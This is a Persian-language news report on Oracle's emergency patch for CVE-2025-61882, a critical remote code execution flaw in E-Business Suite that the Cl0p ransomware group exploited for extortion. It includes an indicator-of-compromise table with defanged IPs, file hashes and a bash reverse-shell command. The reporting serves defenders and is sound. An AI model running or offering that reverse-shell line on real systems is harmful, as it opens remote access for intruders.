شرکت Oracle یک آسیبپذیری بحرانی با شناسه CVE-2025-61882 و امتیاز CVSS 9.8 را در پلتفرم E-Business Suite برطرف کرد که بهطور فعال توسط گروه باجافزار Cl0p مورد سوءاستفاده قرار گرفته بود.
این شرکت وصلهای اضطراری برای رفع این نقص منتشر کرده و در هشدار امنیتی خود اعلام نمود:
«اوراکل مشاوره امنیتی CVE-2025-61882 را بهروزرسانی کرده تا اطلاعات جدید درباره بهرهبرداریهای احتمالی کشفشده را ارائه دهد. اکیداً توصیه میشود مشتریان E-Business Suite دستورالعملهای ارائهشده را در اسرع وقت اجرا کنند.»
جزئیات آسیبپذیری
این نقص به مهاجمان راه دور و بدون نیاز به احراز هویت اجازه میدهد کنترل مولفه Oracle Concurrent Processing را در دست بگیرند.
آسیبپذیری در نسخههای ۱۲.۲.۳ تا ۱۲.۲.۱۴ از E-Business Suite (در بخش BI Publisher Integration) وجود دارد و بهگفته کارشناسان، بهراحتی از طریق HTTP قابل بهرهبرداری است.
درصورت موفقیت حمله، مهاجم میتواند کد دلخواه را از راه دور اجرا کند.
مشاوره اوراکل همچنین شامل مجموعهای از شاخصهای نفوذ (IOC) برای شناسایی فوری و مهار حمله است:
| Indicator | نوع | توضیح |
|---|---|---|
| ۲۰۰[.]۱۰۷[.]۲۰۷[.]۲۶ | IP | فعالیت احتمالی GET و POST |
| ۱۸۵[.]۱۸۱[.]۶۰[.]۱۱ | IP | فعالیت احتمالی GET و POST |
sh -c /bin/bash -i >& /dev/tcp// 0>&1 |
Command | ایجاد اتصال TCP خروجی روی پورت خاص |
| 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA-256 | فایل exploit مربوط به Cl0p |
| aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA-256 | اسکریپت exp.py |
| 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA-256 | فایل server.py |
حملات Cl0p و تاکتیکهای باجگیری
طبق گزارش Mandiant و Google Threat Intelligence Group (GTIG)، گروه Cl0p اخیراً با هدف اخاذی از مدیران شرکتها، ادعا کردهاند دادههای E-Business Suite اوراکل را سرقت کردهاند.
در برخی موارد، مهاجمان با ارائه اسکرینشاتها و ساختار فایلها بهعنوان مدرک نفوذ، تا ۵۰ میلیون دلار باج درخواست کردهاند.
شرکت Halcyon تأیید کرد در یک مورد، دادههای واقعی از سامانه اوراکل قربانی سرقت شده و احتمالاً مهاجمان با نفوذ به ایمیل کاربران و سوءاستفاده از قابلیت بازنشانی رمز عبور پیشفرض اوراکل به اعتبارنامههای معتبر دست یافتهاند.
سینتیا کایزر، معاون مرکز تحقیقات باجافزار Halcyon گفت:
«در روزهای اخیر شاهد درخواستهای باج هفترقمی و هشترقمی از سوی Cl0p بودهایم. این گروه در سرقت گسترده و پنهانی دادهها بسیار معروف است تا در مذاکرات باجگیری قدرت بیشتری داشته باشد.»
ارتباط با گروه FIN11
طبق گفته چارلز کارماکال، مدیر فنی Mandiant، مهاجمان در این کارزار از صدها حساب هکشده برای اخاذی همزمان استفاده کردهاند و حداقل یکی از حسابها به گروه مالیمحور FIN11 مرتبط است.
FIN11 از اوت ۲۰۲۰ سازمانهای متعددی در حوزههای دفاع، انرژی، مالی، سلامت، داروسازی، حقوقی، مخابرات و حملونقل را هدف قرار داده است.
این گروه اغلب در کشورهای اتحادیه کشورهای مستقل مشترکالمنافع (CIS) فعالیت دارد و Cl0p را تنها روی سیستمهایی اجرا میکند که خارج از منطقه CIS باشند.
Mandiant پیشتر مشاهده کرده بود که FIN11 از حملات spear-phishing و بدافزاری به نام FRIENDSPEAK برای نفوذ اولیه استفاده میکند. در ایمیلهای مخرب اطلاعات تماس درج شده که با آدرسهای منتشرشده در سایت نشت داده Cl0p (DLS) مطابقت دارد، که نشانگر ارتباط مستقیم این دو گروه است.
سابقه حملات Cl0p
گروه Cl0p در سالهای اخیر چندین حمله بزرگ با سوءاستفاده از آسیبپذیریهای روز صفر (Zero-day) در نرمافزارهای محبوب انجام داده است، از جمله:
-
Accellion
-
SolarWinds
-
Fortra GoAnywhere
-
MOVEit
کارشناسان Mandiant توصیه کردهاند سازمانها محیط خود را برای شاخصهای نفوذ مرتبط با فعالیت Cl0p بررسی کنند و وصله اوراکل را فوراً اعمال نمایند.
یک نظر